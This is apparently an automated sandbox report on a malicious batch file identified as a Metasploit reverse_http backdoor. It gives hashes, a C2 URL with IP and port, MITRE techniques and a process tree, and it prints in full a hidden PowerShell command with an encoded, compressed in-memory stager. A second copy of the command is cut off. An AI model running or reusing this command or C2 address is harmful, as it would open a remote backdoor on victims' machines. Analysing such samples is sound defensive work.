metasploit | 9b6a8e674502750d003fd795b210f842e85299e8f80484d74362152146a99570

General

Target

7337f39a5ba72a7f74cc8915d26e84b8.bat
Size

7KB
MD5

7337f39a5ba72a7f74cc8915d26e84b8
SHA1

ec768217f55dc32ccb2b6dcf82cbf0fbaa78913e
SHA256

9b6a8e674502750d003fd795b210f842e85299e8f80484d74362152146a99570
SHA512

3fe77588664ed994dd38cc4c7f8f71b64bd83de3c97b443996ee7fe3cc2cde187b42be7877908cd26aac9b058bbc2764d53bd523022aef5103deaac21f85227c
SSDEEP

192:+n2jh1hqT2BkbI5ofdiPcklcNRbJraXUjeBPjcF6hdC:+n2jh1hs+kbqoVaPlERIkSBr3hdC

Score

10^/10

metasploit backdoor discovery execution trojan

Malware Config

Extracted

Family

metasploit

Version

windows/reverse_http

C2

http://89.197.154.115:7700/ih4cyGecAj0duhy7eltmzQo4WCxwpVTVdgyRKZrcT-IZi-ykXLZvMxz4IGCUvaiR0wrVtAp0fWkwIACV8TVd4z2_DHbSHQVjIToJhqAol9MrnN4FksZWgFlxarU1GZ

Signatures

MetaSploit
Detected malicious payload which is part of the Metasploit Framework, likely generated with msfvenom or similar.
trojan backdoor metasploit
Metasploit family
metasploit

Blocklisted process makes network request 20 IoCs

flow	pid	Process
4	3060	powershell.exe
5	3060	powershell.exe
6	3060	powershell.exe
7	3060	powershell.exe
8	3060	powershell.exe
9	3060	powershell.exe
11	3060	powershell.exe
12	3060	powershell.exe
13	3060	powershell.exe
14	3060	powershell.exe
15	3060	powershell.exe
16	3060	powershell.exe
18	3060	powershell.exe
19	3060	powershell.exe
20	3060	powershell.exe
21	3060	powershell.exe
22	3060	powershell.exe
23	3060	powershell.exe
25	3060	powershell.exe
26	3060	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

Run Powershell and hide display window.

execution

PowerShell

T1059.001

pid	Process
2680	powershell.exe
3060	powershell.exe

System Location Discovery: System Language Discovery 1 TTPs 1 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe

Suspicious behavior: EnumeratesProcesses 2 IoCs

pid	Process
2680	powershell.exe
3060	powershell.exe

Suspicious use of AdjustPrivilegeToken 2 IoCs

description	pid	Process
Token: SeDebugPrivilege	2680	powershell.exe
Token: SeDebugPrivilege	3060	powershell.exe

Suspicious use of WriteProcessMemory 10 IoCs

description	pid	Process	procid_target
PID 2100 wrote to memory of 2968	2100	cmd.exe	31
PID 2100 wrote to memory of 2968	2100	cmd.exe	31
PID 2100 wrote to memory of 2968	2100	cmd.exe	31
PID 2968 wrote to memory of 2680	2968	cmd.exe	32
PID 2968 wrote to memory of 2680	2968	cmd.exe	32
PID 2968 wrote to memory of 2680	2968	cmd.exe	32
PID 2680 wrote to memory of 3060	2680	powershell.exe	33
PID 2680 wrote to memory of 3060	2680	powershell.exe	33
PID 2680 wrote to memory of 3060	2680	powershell.exe	33
PID 2680 wrote to memory of 3060	2680	powershell.exe	33

C:\Windows\system32\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\7337f39a5ba72a7f74cc8915d26e84b8.bat"
1⤵
- Suspicious use of WriteProcessMemory
PID:2100
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /b /c start /b /min powershell.exe -nop -w hidden -e aQBmACgAWwBJAG4AdABQAHQAcgBdADoAOgBTAGkAegBlACAALQBlAHEAIAA0ACkAewAkAGIAPQAnAHAAbwB3AGUAcgBzAGgAZQBsAGwALgBlAHgAZQAnAH0AZQBsAHMAZQB7ACQAYgA9ACQAZQBuAHYAOgB3AGkAbgBkAGkAcgArACcAXABzAHkAcwB3AG8AdwA2ADQAXABXAGkAbgBkAG8AdwBzAFAAbwB3AGUAcgBTAGgAZQBsAGwAXAB2ADEALgAwAFwAcABvAHcAZQByAHMAaABlAGwAbAAuAGUAeABlACcAfQA7ACQAcwA9AE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEQAaQBhAGcAbgBvAHMAdABpAGMAcwAuAFAAcgBvAGMAZQBzAHMAUwB0AGEAcgB0AEkAbgBmAG8AOwAkAHMALgBGAGkAbABlAE4AYQBtAGUAPQAkAGIAOwAkAHMALgBBAHIAZwB1AG0AZQBuAHQAcwA9ACcALQBuAG8AcAAgAC0AdwAgAGgAaQBkAGQAZQBuACAALQBjACAAJgAoAFsAcwBjAHIAaQBwAHQAYgBsAG8AYwBrAF0AOgA6AGMAcgBlAGEAdABlACgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBJAE8ALgBTAHQAcgBlAGEAbQBSAGUAYQBkAGUAcgAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEkATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgAuAEcAegBpAHAAUwB0AHIAZQBhAG0AKAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEkATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtACgALABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAKAAoACcAJwBIADQAcwBJAEEASABkADcANABXAGMAQwBBADcAVgBYAGEAMgAvAHsAMgB9AFIAaABmACsAWABxAG4ALwB3AGEAcQBRAE0AQwBvAEIAQQAwADQAMgAnACcAKwAnACcAcgBGAFMAcABOAG0AQQB3AHsAMgB9ADcAbgA1AGwAawBCAFIATgBiAEUASABlADIARABzAGMAZQB4AHgAZwBMAFQAOQA3AHoAMwBtAHMAcwBsADIAawAvAGYAZABWAGwAcABMAEsAUABiAE0AdQBUADcAbgBtAG4AVQBlAGUANQB5AHcAVwBLAEQAdAB5AFUARAA0ADQAOABjAGYAaABQAE0AegBSAFMAbQBLAEIATABHAFUAcgBxACsAcgBRAG0AbgB0AGQANQA0AHEATAA1AGUAbAA3AFMAUgBvAEUAZQBFAFgAUQBWAHcAcQBTAGQASgBsAEUAUwBMAHgANgB1AFAASABUAHAANgBtAE8ATwBhAG4ANwAxAG8AZgBjAHkAWABMAGMAUABSAEEAQwBjADcARQB7ADIAfQB2AEMAJwAnACsAJwAnAG4ANABJAFkANAB4AFYAZQBUAGgAdwAzADIAdQBQAEMASABVAFAAcQA5ADEAcQBmAHMAQQBkAEUAegAyAGEARwBEAHYAQgBBAEwAVgAwAHIAcwBGADMAYwBqADUAcQBIAEMAdABKAHEAewAxAH0AVQBNAEwARgA4AG0AKwAvAGwAUwB2AEwAcQA4AGEAcQAxAG4AdgBNAEUAYwAzAEUAcwBuAG4ASQBPAEkANQBxAFAAcQBYAGwAewAyAH0AdgBCAFgAcAAnACcAKwAnACcAVgBCAG8ASABSAEkAcwBsAGcAMwB7ADIAfQBwAFMAeABqAGEAMQA1AHoAUwBkAHgAcQAxAHUAdwAnACcAKwAnACcANABRADIAcwA4AEIAbQBsAFAAMgBNAEEAOAB7ADEAfQBIADUAVwBCAG0AOQBlAC8ARQBrAHgAegA5AFAANAA3AEYAWQBoADUAMABRAGwAbAB1AEYAMQBtAGoASgBQADgAZgAwAFUAewAxAH0AMQBtACcAJwArACcAJwA1AEsAewAyAH0AdwBMAEQAYwB2AFYANgAnACcAKwAnACcAbABkAHgAZQBWAFkALwB6ADIATgBPAEkAbAB6AFQAWQA0ADUAVABsAHAAZwA0AGYAUwBJAGUAegBtAG8ARABGAFAAcwBVAHoALwBGADYAQgBWAHcAbQBUADAAawBjAHIAQwBvAFYASQBIAHQAewAyAH0AVwB5AHkAVwA0AHAAegBTAHEAdgBCAHYAeABJAGgAagB2AEwAdQBBADkANgAxAE0ANABtAHMAbQBvAEoAcgB5AHQARgBLAEYAcQBMADcAbABxAE0ASAA4AG4ATwAnACcAKwAnACcASQBUAGEALwBrAE4AUwA0AHQAVQBxAE0AQgB6AFMAUQBkAEEAOABLACcAJwArACcAJwA4AEMAeABQAFUAbABoAGMASQA4AGYAUwBPAEQAWABnADQAdQB6AC8ASgA0AGcAOABGAGsAYwBjAG8AeQBjAHUAVAA5AFIAewAxAH0AQwBxAGcAZwBHADYARQBXAGYAcABBAFQANQBMAFYAcAByAGoAeQB1AG8AegA0AEsAQwBVAFYAYgA5AFYAVgB1AFAAQwAnACcAKwAnACcAQwBHAHkAYgB2AGQAMgBGAG8ANgBYAEQAewAyAH0ATAA5ADYARQBmAEIARgAvAEUAdABFAEgAewAyAH0AUQBGADAAZgB2AHsAMQB9ADMATQBWAHIARQB1AFAAdQBJAFUAWQBSADgAUwA0AEoASwA3ADQAVgBFADcAeQBtACsAQQBoAEkANwBVAEkAMgBCAGcAdgBGADgAdgBrAEMAKwAxADEATQBjAFkAQgA0AEEAWABLAFIARwBsACsAeAA5AFMATABDAFAALwBPACcAJwArACcAJwBxAE8AYQBFACsAVABoAFUAUAA0AHAAcQBCAFYAUgBEAHkAeQBwAGYARwBuAE8ASQBtAGwAdgBYAFkAdwBCAEcAQQBkAC8AbwB1AEYAMgBHAEMATQBzAEUAWAA2AG4ATgBwAEgAQwA3AGEAewAyAH0AMgAnACcAKwAnACcAOABnAEsAbgBjAG8AeQByAEsAcQBNAE0AMgBoAFQAcgAyAHEAWQBHAEoARQBzAFYAOABWAGwARABnAGoANQB5AHMAbAA1ACsAegA0AFcAbgA0AHgAMQA4AGcAcABKAHgANwBLACsARQBYAGMAcQB2AEkAUABPAE0AOQBxAE8AeQB6AE8AZQBKAHAANwBFAEYAYQBBAHcARABJAFQANwBCAEYARQBDADAAUwBxAHcAbwBEADQAVwBEADIAWQBKAEwAewAyAH0AbwBMADcAKwBKAFIAdwBkAFIAQwB0AFUARABrAHAANABnAEgAbgBCAFMANABHAEQAeQBJAGwAbABTAHYAMwBDAFQAVgBXAG8AbQA1AG4AcQBVAFUAQgB3AEIAeABiAEYAcgBhAEIAUQBGADAAQwBQAE8ARgBYAEwATQBMAFIAUgBnAHYALwB5AE8AbQB7ADEAfQBjADYATwBDAFYAOQBnAGMAcwBGAGsARgBkAEcAUQByAEIATgB5AG4AaABWAGMARQBqAEsAbwBRAGMAVgBHAEIAZgBwADkAUgA5AHMAKwBMAHIAMwBIAEkAMwBwAHAAUABnAGMARwB2AEYAUwBYAGsAdgAxAHcASQBzAEMASwAnACcAKwAnACcARAAxADMARQBTAHQAeQA5AEEAegBRAEUAWQA2AFUAQQB4AFIAYQB5AHsAMgB9AEkAVgB7ADEAfQBmAGgARwBQAHIAVQB7ADEAfQA4AGEAZgA2AGgARQB3AFYAZQBPADcAMQBtAEIAcgArAGMARQBzAGEAKwBnADUAKwBCAHYAeABzADAAdABKAHsAMQB9ADkANABQAC8AYQBiAGcAewAxAH0AMQBBADIAdgBrADAAMwAnACcAKwAnACcANwAyAHEAMQBDAGQAcwBIAE8AdQB4ADAAcgBuAGoALwAwAGMAZAB0ADAAewAxAH0ARwA3ADIAZABOADYAewAxAH0ASwBvAE0AewAxAH0AawBWAFEANQA5AEYAVABKAEsAdAA0AGIAUQBVAEMAawA0AEYANwB4AHgANwBQACcAJwArACcAJwBRAG8AOQBLADAARgA0ADMARwBlAHIAYQB2ADcAJwAnACsAJwAnAHcAewAxAH0AdQBJAGUAcwBrAHcANQBQAGwAdwB7ADEAfQAyAGsAdABGAHIAeQBwAEMAVgB0AEEAYgAxADcANABOAHMAQwBUADAAUgAyACsAeABHADgAUQB6ACsAZABqAEYAUQA5AFUAeQBXAGQAOQBvAGEAZAArAFkAUABiADEAQgBZAHUASABkAFIAbABMAFYAeQA3AEwARABOAHYANwByAHYAMQBlAHIAMwB0AG8ALwA0ADEAOQBSAFcAVgArAFUAMgBhAEkAMgBmAE8AcgBJAEUAWABxAGYAVwA2AFkALwBqAGMAcwBoAHQAagB5AC8ANAA1AGIAQgBWACsAVwBtADcANwBCAHIAbgA3ADcATgA2ADgAYgBZAHcAMgBTAHYAQwBwADEAdwBqAHYAZwBjAGYAdgB0ADUAOQBSAE4AdwB0AE0AOQAxAHAAYQB1AEwAdgBBAGMAcgBXAE4AMwBtAHQAYgB1AGgAWQAnACcAKwAnACcARQBoAGoAVgBmAGoAeAB1ADMAaAAwACsAbQBxAG4AbwBEAE4AVgBzADQAUAByADMAZgA4AHMAVAB2ADMARABhAE4AcgBwADAAYgBwAHIAdwBmAG0AdwBvAHoAcABkAEMAMgA3AEYAMgBtADkALwBjAEoAYQB0AHIAQgB2AE8AbABzAFUAJwAnACsAJwAnAFAATQAyADAAYgBVAEYAOQBlAEoAeAA4AHQAQwBVAG4AdwB6AEwAeQA4AGMAZABlAGEAOQByADQAMwBBAFIAYQBRAGQAawB2AHAASQB4AFUAOQBtAEUATABxADQAVABzAEIAdABzAGYAbABUAEEAYgBxAFQATwBzAEsASgAwAFcAWABmAFgAVQA1AFIATwBPADAASABkACsAUQBiAGIAbwBGAC8AUwBIAG8AMwArAHYASQBFAEcAMgA5AGIAQwAzAFUAcwBQAGQAOABuADgANABYAGwAKwBOADIAdQBGAEwAVQA5AGIAMgBFADQAMABqADcARQB6AEgATABuAHgAYwBPAE4AMABHAGsATQAzADIAbgBMACcAJwArACcAJwBzADgAbgB0AEwAUwA1AHIAVwBYAFgAZwB6ADcAdABIAEIAcgBPAEUAMAA3ADEAMQBxAEcAZwBQAC8ANABNAFIAegAxAGUAdQBxAGsAZABQAGsATABkAFAAVwB1AHMANABtAEIAQgBrAHoAQwBXACsARwA2ADMAawB2AEoATABZAFUAegBwADAAbwBHAFQAcgA5ADkAewAyAH0AJwAnACsAJwAnAGMAMAAwAE4AUwBIADUAdQA3AGEAdQBoAHYAbQAxAG0AYgBlAFIANgAwAHgAYwBwAHAAKwAvADIARQBRAFEAcQBqAHQALwBiAHoAQgBGAEwAcwBmADMAcABGAEYAdgBWADkAdgB1ADgATQA5AEgAVABPAGwATwAyAEsAaABCAG4ARgBvACsASgBZAFQAYgBWAEwASABsAEQALwBBAG4AWQB1AEMAewAxAH0ASQAxADAANQBSAG0AYwBHADgAcAA5ADEAcgBQADcAYgBPADEARQBZAFcATwBlADMAQQBDAHYAYwA0AHkAZABFAHcAVgBjAEQAYwBPAEMAWAB0AHMATgBiAEIAdgBwAGcAYQBWAEEAcgBPAGQAVABwAFMARgBQADYANAA3AFYAdQBoAHYAZgA5AEQASwBJAHIAdgBvADQANgB3AGMASwBJAEsAVQBnACsATQAwAFUAMQBVAEkAYQAyAGQAbwAvADMAOQBVAGIAQwA5AEEAdAB4ADcASABUAEQAQgBRAGQANwB1AHoARwBnAHYAVQBTAE4ASgBTAGYANgBrACcAJwArACcAJwA2AFIAcwA4ADkAeQBOAGwAQwA4AEMAYwB7ADIAfQAnACcAKwAnACcALwBvADYANAB4AFgAdAAvADAAbgB5AEMAdgBiAHUAJwAnACsAJwAnAFUASgB4AEcAVQBDAE0AVABNAHMAVwB4AHAAdABlAGgAQwBqAHoAbwBmAGIAawBVAHUAYwBDAEgAeQBFAE8AUAAwAEUAeABiAGUAMABTAGMAeABiAHoAVgBVAHAATwBFADYAbgBIADMAOABvAHIAVwBmADYAcQAvAHAANwBiAC8AWQBhAEsATQAxAEMAUgBLAEUAdQBZAGEAewAxAH0AZQB1AHEAUABHAFUAdQAwADgASgBxAGUATQBGAEIAeQB7ADIAfQBlAE4AeQA0AHQAagB7ADIAfQBOAE0AWQBVAGQAQgBiAGEAWQBTADEAdABSAEsARwBWAGUATQBhAGEATABnAFEAbwBiAHcAbQBsAHUARgAyAHUARQByAFIAOQBOAGUAdQB1AHQASQBuAHcAbQByAEwAdwBNADcAOAB2AFIAeAA0ADgATABNAEIATAA2AFYATgBGAEUAYQB7ADIAfQBNAGMAQgB6AHkAcwBTAHYAdQBXAEoATQBIAFkAbABmAGEAUwBmAEcAeABKADMAKwA1AGEAaAB5AFUASAA4AFMAewAyAH0AcwBXAGcAegB1AEEAcABxAEwAJwAnACsAJwAnAGMASABvAFUARAB2AEwASQBXAGgARABGADcANAA4AFcANwBHAGMAYwBCAHMAVwA3AGUATAAwAEgASABhAGoAZQBRAG0ATwBIAE8AWABOAHEAdAB3AFcAQQBLAG0AUAAwAE4AWAB3AG4AdgB6ADUAbgB3AG0AdgB3AEEATABVAEcAZQBMADQAcwBOAGoATgBJAEUAVwBDAC8AdwBvADkAQwB7ADIAfQBSAGQAYgB5ACsAcwB0AHEASgBTAEYAMwBlACsAYgBOAGUAZQB7ADEAfQBFAGMASQBmAC8ALwA5AGsAegBjAHYAewAxAH0ALwA3AGoAOQBwAGsAeQBTAHEAawBkAHMAdgBqAHIAOQA4AHUARABWAHMAUAAyAE8AQQBMAHsAMgB9AEkAYwBLAEEAMABZAGYAUgBSAGYARgByAEcAMwBzAFQAaABYAEMAewAyAH0AdgB3AGcAdQB4AGcAUwBwAFkAbgA1AC8AewAyAH0AWAA1AFIASgB6AHEALwBHAHMAUABBAGUAaAArAC8AZgBXAGoAKwBtAHMAUgAwAE4AQQBBAEEAewAwAH0AJwAnACkALQBmACcAJwA9ACcAJwAsACcAJwBaACcAJwAsACcAJwBpACcAJwApACkAKQApACwAWwBTAHkAcwB0AGUAbQAuAEkATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgBNAG8AZABlAF0AOgA6AEQAZQBjAG8AbQBwAHIAZQBzAHMAKQApACkALgBSAGUAYQBkAFQAbwBFAG4AZAAoACkAKQApACcAOwAkAHMALgBVAHMAZQBTAGgAZQBsAGwARQB4AGUAYwB1AHQAZQA9ACQAZgBhAGwAcwBlADsAJABzAC4AUgBlAGQAaQByAGUAYwB0AFMAdABhAG4AZABhAHIAZABPAHUAdABwAHUAdAA9ACQAdAByAHUAZQA7ACQAcwAuAFcAaQBuAGQAbwB3AFMAdAB5AGwAZQA9ACcASABpAGQAZABlAG4AJwA7ACQAcwAuAEMAcgBlAGEAdABlAE4AbwBXAGkAbgBkAG8AdwA9ACQAdAByAHUAZQA7ACQAcAA9AFsAUwB5AHMAdABlAG0ALgBEAGkAYQBnAG4AbwBzAHQAaQBjAHMALgBQAHIAbwBjAGUAcwBzAF0AOgA6AFMAdABhAHIAdAAoACQAcwApADsA
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2968
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell.exe -nop -w hidden -e aQBmACgAWwBJAG4AdABQAHQAcgBdADoAOgBTAGkAegBlACAALQBlAHEAIAA0ACkAewAkAGIAPQAnAHAAbwB3AGUAcgBzAGgAZQBsAGwALgBlAHgAZQAnAH0AZQBsAHMAZQB7ACQAYgA9ACQAZQBuAHYAOgB3AGkAbgBkAGkAcgArACcAXABzAHkAcwB3AG8AdwA2ADQAXABXAGkAbgBkAG8AdwBzAFAAbwB3AGUAcgBTAGgAZQBsAGwAXAB2ADEALgAwAFwAcABvAHcAZQByAHMAaABlAGwAbAAuAGUAeABlACcAfQA7ACQAcwA9AE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEQAaQBhAGcAbgBvAHMAdABpAGMAcwAuAFAAcgBvAGMAZQBzAHMAUwB0AGEAcgB0AEkAbgBmAG8AOwAkAHMALgBGAGkAbABlAE4AYQBtAGUAPQAkAGIAOwAkAHMALgBBAHIAZwB1AG0AZQBuAHQAcwA9ACcALQBuAG8AcAAgAC0AdwAgAGgAaQBkAGQAZQBuACAALQBjACAAJgAoAFsAcwBjAHIAaQBwAHQAYgBsAG8AYwBrAF0AOgA6AGMAcgBlAGEAdABlACgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBJAE8ALgBTAHQAcgBlAGEAbQBSAGUAYQBkAGUAcgAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEkATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgAuAEcAegBpAHAAUwB0AHIAZQBhAG0AKAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEkATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtACgALABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAKAAoACcAJwBIADQAcwBJAEEASABkADcANABXAGMAQwBBADcAVgBYAGEAMgAvAHsAMgB9AFIAaABmACsAWABxAG4ALwB3AGEAcQBRAE0AQwBvAEIAQQAwADQAMgAnACcAKwAnACcAcgBGAFMAcABOAG0AQQB3AHsAMgB9ADcAbgA1AGwAawBCAFIATgBiAEUASABlADIARABzAGMAZQB4AHgAZwBMAFQAOQA3AHoAMwBtAHMAcwBsADIAawAvAGYAZABWAGwAcABMAEsAUABiAE0AdQBUADcAbgBtAG4AVQBlAGUANQB5AHcAVwBLAEQAdAB5AFUARAA0ADQAOABjAGYAaABQAE0AegBSAFMAbQBLAEIATABHAFUAcgBxACsAcgBRAG0AbgB0AGQANQA0AHEATAA1AGUAbAA3AFMAUgBvAEUAZQBFAFgAUQBWAHcAcQBTAGQASgBsAEUAUwBMAHgANgB1AFAASABUAHAANgBtAE8ATwBhAG4ANwAxAG8AZgBjAHkAWABMAGMAUABSAEEAQwBjADcARQB7ADIAfQB2AEMAJwAnACsAJwAnAG4ANABJAFkANAB4AFYAZQBUAGgAdwAzADIAdQBQAEMASABVAFAAcQA5ADEAcQBmAHMAQQBkAEUAegAyAGEARwBEAHYAQgBBAEwAVgAwAHIAcwBGADMAYwBqADUAcQBIAEMAdABKAHEAewAxAH0AVQBNAEwARgA4AG0AKwAvAGwAUwB2AEwAcQA4AGEAcQAxAG4AdgBNAEUAYwAzAEUAcwBuAG4ASQBPAEkANQBxAFAAcQBYAGwAewAyAH0AdgBCAFgAcAAnACcAKwAnACcAVgBCAG8ASABSAEkAcwBsAGcAMwB7ADIAfQBwAFMAeABqAGEAMQA1AHoAUwBkAHgAcQAxAHUAdwAnACcAKwAnACcANABRADIAcwA4AEIAbQBsAFAAMgBNAEEAOAB7ADEAfQBIADUAVwBCAG0AOQBlAC8ARQBrAHgAegA5AFAANAA3AEYAWQBoADUAMABRAGwAbAB1AEYAMQBtAGoASgBQADgAZgAwAFUAewAxAH0AMQBtACcAJwArACcAJwA1AEsAewAyAH0AdwBMAEQAYwB2AFYANgAnACcAKwAnACcAbABkAHgAZQBWAFkALwB6ADIATgBPAEkAbAB6AFQAWQA0ADUAVABsAHAAZwA0AGYAUwBJAGUAegBtAG8ARABGAFAAcwBVAHoALwBGADYAQgBWAHcAbQBUADAAawBjAHIAQwBvAFYASQBIAHQAewAyAH0AVwB5AHkAVwA0AHAAegBTAHEAdgBCAHYAeABJAGgAagB2AEwAdQBBADkANgAxAE0ANABtAHMAbQBvAEoAcgB5AHQARgBLAEYAcQBMADcAbABxAE0ASAA4AG4ATwAnACcAKwAnACcASQBUAGEALwBrAE4AUwA0AHQAVQBxAE0AQgB6AFMAUQBkAEEAOABLACcAJwArACcAJwA4AEMAeABQAFUAbABoAGMASQA4AGYAUwBPAEQAWABnADQAdQB6AC8ASgA0AGcAOABGAGsAYwBjAG8AeQBjAHUAVAA5AFIAewAxAH0AQwBxAGcAZwBHADYARQBXAGYAcABBAFQANQBMAFYAcAByAGoAeQB1AG8AegA0AEsAQwBVAFYAYgA5AFYAVgB1AFAAQwAnACcAKwAnACcAQwBHAHkAYgB2AGQAMgBGAG8ANgBYAEQAewAyAH0ATAA5ADYARQBmAEIARgAvAEUAdABFAEgAewAyAH0AUQBGADAAZgB2AHsAMQB9ADMATQBWAHIARQB1AFAAdQBJAFUAWQBSADgAUwA0AEoASwA3ADQAVgBFADcAeQBtACsAQQBoAEkANwBVAEkAMgBCAGcAdgBGADgAdgBrAEMAKwAxADEATQBjAFkAQgA0AEEAWABLAFIARwBsACsAeAA5AFMATABDAFAALwBPACcAJwArACcAJwBxAE8AYQBFACsAVABoAFUAUAA0AHAAcQBCAFYAUgBEAHkAeQBwAGYARwBuAE8ASQBtAGwAdgBYAFkAdwBCAEcAQQBkAC8AbwB1AEYAMgBHAEMATQBzAEUAWAA2AG4ATgBwAEgAQwA3AGEAewAyAH0AMgAnACcAKwAnACcAOABnAEsAbgBjAG8AeQByAEsAcQBNAE0AMgBoAFQAcgAyAHEAWQBHAEoARQBzAFYAOABWAGwARABnAGoANQB5AHMAbAA1ACsAegA0AFcAbgA0AHgAMQA4AGcAcABKAHgANwBLACsARQBYAGMAcQB2AEkAUABPAE0AOQBxAE8AeQB6AE8AZQBKAHAANwBFAEYAYQBBAHcARABJAFQANwBCAEYARQBDADAAUwBxAHcAbwBEADQAVwBEADIAWQBKAEwAewAyAH0AbwBMADcAKwBKAFIAdwBkAFIAQwB0AFUARABrAHAANABnAEgAbgBCAFMANABHAEQAeQBJAGwAbABTAHYAMwBDAFQAVgBXAG8AbQA1AG4AcQBVAFUAQgB3AEIAeABiAEYAcgBhAEIAUQBGADAAQwBQAE8ARgBYAEwATQBMAFIAUgBnAHYALwB5AE8AbQB7ADEAfQBjADYATwBDAFYAOQBnAGMAcwBGAGsARgBkAEcAUQByAEIATgB5AG4AaABWAGMARQBqAEsAbwBRAGMAVgBHAEIAZgBwADkAUgA5AHMAKwBMAHIAMwBIAEkAMwBwAHAAUABnAGMARwB2AEYAUwBYAGsAdgAxAHcASQBzAEMASwAnACcAKwAnACcARAAxADMARQBTAHQAeQA5AEEAegBRAEUAWQA2AFUAQQB4AFIAYQB5AHsAMgB9AEkAVgB7ADEAfQBmAGgARwBQAHIAVQB7ADEAfQA4AGEAZgA2AGgARQB3AFYAZQBPADcAMQBtAEIAcgArAGMARQBzAGEAKwBnADUAKwBCAHYAeABzADAAdABKAHsAMQB9ADkANABQAC8AYQBiAGcAewAxAH0AMQBBADIAdgBrADAAMwAnACcAKwAnACcANwAyAHEAMQBDAGQAcwBIAE8AdQB4ADAAcgBuAGoALwAwAGMAZAB0ADAAewAxAH0ARwA3ADIAZABOADYAewAxAH0ASwBvAE0AewAxAH0AawBWAFEANQA5AEYAVABKAEsAdAA0AGIAUQBVAEMAawA0AEYANwB4AHgANwBQACcAJwArACcAJwBRAG8AOQBLADAARgA0ADMARwBlAHIAYQB2ADcAJwAnACsAJwAnAHcAewAxAH0AdQBJAGUAcwBrAHcANQBQAGwAdwB7ADEAfQAyAGsAdABGAHIAeQBwAEMAVgB0AEEAYgAxADcANABOAHMAQwBUADAAUgAyACsAeABHADgAUQB6ACsAZABqAEYAUQA5AFUAeQBXAGQAOQBvAGEAZAArAFkAUABiADEAQgBZAHUASABkAFIAbABMAFYAeQA3AEwARABOAHYANwByAHYAMQBlAHIAMwB0AG8ALwA0ADEAOQBSAFcAVgArAFUAMgBhAEkAMgBmAE8AcgBJAEUAWABxAGYAVwA2AFkALwBqAGMAcwBoAHQAagB5AC8ANAA1AGIAQgBWACsAVwBtADcANwBCAHIAbgA3ADcATgA2ADgAYgBZAHcAMgBTAHYAQwBwADEAdwBqAHYAZwBjAGYAdgB0ADUAOQBSAE4AdwB0AE0AOQAxAHAAYQB1AEwAdgBBAGMAcgBXAE4AMwBtAHQAYgB1AGgAWQAnACcAKwAnACcARQBoAGoAVgBmAGoAeAB1ADMAaAAwACsAbQBxAG4AbwBEAE4AVgBzADQAUAByADMAZgA4AHMAVAB2ADMARABhAE4AcgBwADAAYgBwAHIAdwBmAG0AdwBvAHoAcABkAEMAMgA3AEYAMgBtADkALwBjAEoAYQB0AHIAQgB2AE8AbABzAFUAJwAnACsAJwAnAFAATQAyADAAYgBVAEYAOQBlAEoAeAA4AHQAQwBVAG4AdwB6AEwAeQA4AGMAZABlAGEAOQByADQAMwBBAFIAYQBRAGQAawB2AHAASQB4AFUAOQBtAEUATABxADQAVABzAEIAdABzAGYAbABUAEEAYgBxAFQATwBzAEsASgAwAFcAWABmAFgAVQA1AFIATwBPADAASABkACsAUQBiAGIAbwBGAC8AUwBIAG8AMwArAHYASQBFAEcAMgA5AGIAQwAzAFUAcwBQAGQAOABuADgANABYAGwAKwBOADIAdQBGAEwAVQA5AGIAMgBFADQAMABqADcARQB6AEgATABuAHgAYwBPAE4AMABHAGsATQAzADIAbgBMACcAJwArACcAJwBzADgAbgB0AEwAUwA1AHIAVwBYAFgAZwB6ADcAdABIAEIAcgBPAEUAMAA3ADEAMQBxAEcAZwBQAC8ANABNAFIAegAxAGUAdQBxAGsAZABQAGsATABkAFAAVwB1AHMANABtAEIAQgBrAHoAQwBXACsARwA2ADMAawB2AEoATABZAFUAegBwADAAbwBHAFQAcgA5ADkAewAyAH0AJwAnACsAJwAnAGMAMAAwAE4AUwBIADUAdQA3AGEAdQBoAHYAbQAxAG0AYgBlAFIANgAwAHgAYwBwAHAAKwAvADIARQBRAFEAcQBqAHQALwBiAHoAQgBGAEwAcwBmADMAcABGAEYAdgBWADkAdgB1ADgATQA5AEgAVABPAGwATwAyAEsAaABCAG4ARgBvACsASgBZAFQAYgBWAEwASABsAEQALwBBAG4AWQB1AEMAewAxAH0ASQAxADAANQBSAG0AYwBHADgAcAA5ADEAcgBQADcAYgBPADEARQBZAFcATwBlADMAQQBDAHYAYwA0AHkAZABFAHcAVgBjAEQAYwBPAEMAWAB0AHMATgBiAEIAdgBwAGcAYQBWAEEAcgBPAGQAVABwAFMARgBQADYANAA3AFYAdQBoAHYAZgA5AEQASwBJAHIAdgBvADQANgB3AGMASwBJAEsAVQBnACsATQAwAFUAMQBVAEkAYQAyAGQAbwAvADMAOQBVAGIAQwA5AEEAdAB4ADcASABUA